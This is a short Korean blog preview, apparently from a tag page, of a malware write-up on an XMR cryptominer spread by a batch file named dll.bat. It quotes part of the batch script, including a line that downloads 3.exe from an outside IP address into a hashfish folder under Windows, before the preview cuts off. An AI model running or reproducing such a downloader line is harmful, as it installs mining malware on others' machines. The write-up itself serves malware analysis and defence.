hashfish 썸네일형 리스트형 XMR CoinMiner (BAT + Hashfish) 안녕하세요? 올만에 글을 쓰게 됩니다. 이번에 글을 쓰는 이유는 올만에 파일을 발견하였기 때문입니다. 간락히 쓰고 그냥 MD5 공유 하려고 합니다. 1. dll.bat - 인터넷에서 감염 추정 (8월 16일) / 파일 발견 일자 (9월 17일) 2. .bat 파일 구조 3. .bat 파일 실행 구조 (핵심) @echo off (웹 다운로드 부분) taskkill /im 3.exe /f md c:\windows\hashfish del c:\windows\hashfish\3.exe call :http "http://120.236.74.201:74/3.exe" c:\windows\hashfish\3.exe // SFX 압축 파일 (채굴 위한 악성코드) ping 127.0.0.1 -n 2 >nul if exis.. 더보기 이전 1 다음